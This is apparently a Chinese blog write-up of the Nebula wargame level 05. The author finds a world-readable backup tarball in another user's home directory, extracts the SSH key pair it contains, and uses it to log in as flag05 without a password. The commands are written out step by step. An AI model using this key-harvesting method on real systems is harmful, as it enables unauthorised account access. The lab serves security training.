本文介绍了一种通过查找弱权限目录并利用其中的备份文件来实现免密码SSH登录的方法。通过查看目录权限,发现了一个可被其他用户访问的.backup目录,并在其中找到了可读的备份文件。将此备份文件复制并解压后,获得了公私钥,从而实现了对目标账户的无密码登录。
About
Check the flag05 home directory. You are looking for weak directory permissions
Nebula官网
思路
进去看看
cd /home/flag05/
ll发现一个其他人可执行的.backup目录
cd .backup/
ll看到其他人可读的backup-19072011.tgz
复制到/tmp解压
cp backup-19072011.tgz /tmp/
cd /tmp/
tar -xvf backup-19072011.tgz看到了备份的公私钥,所以应该可以凭借这些密钥ssh免密码登录flag05账户
cp -r .ssh/ ~/
ssh flag05@localhost
yes
cat flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
